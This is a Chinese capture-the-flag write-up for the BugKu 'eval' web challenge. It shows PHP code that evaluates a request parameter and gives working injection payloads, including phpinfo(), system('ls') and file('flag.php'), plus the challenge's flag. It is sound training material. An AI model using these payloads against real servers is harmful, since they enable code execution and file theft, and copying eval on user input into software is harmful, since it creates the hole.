BugKu-WEB-eval

BugKu-WEB-eval

Mel0ny Lv5

BugKu-WEB-eval

题目

Question
Question

思路

注:看到一位评论区的大佬,讲得超级详细,也解决了我很多做题的时候的疑问:链接

打开靶机可以看到php代码

1
2
3
4
5
6
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>

代码审计可以发现这个是一个eval()的注入题
直接在链接后面加入下列参数,看看成不成功,发现可以执行代码

注:)为了和前面的括号拼在一起组成一条命令,也就是var_dump(1),然后再街上后面的命令phpinfo(),//用来注释掉后面的括号

1
?hello=1);phpinfo();//

Question

那我们直接找出flag的变量,但是不太行,出题者猜到了我们想干什么

1
?hello=1);var_dump($flag);//

Question

再试试超级全局变量GLOBALS

Question

使用ls看看看看有什么文件吧

1
?hello=1);system('ls');//

Question

发现有flag.php文件,用cat查看,发现不太行,查资料后发现可以使用file()函数查看文件(忘截图了)

1
?hello=1);file('flag.php');//

Flag

1
flag{327d120419841b15b254a31217aa3f00}
  • 标题: BugKu-WEB-eval
  • 作者: Mel0ny
  • 创建于 : 2025-09-02 23:42:49
  • 更新于 : 2025-09-03 00:30:25
  • 链接: https://mel0nyrame.github.io/2025/09/02/BugKu-WEB-eval/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
BugKu-WEB-eval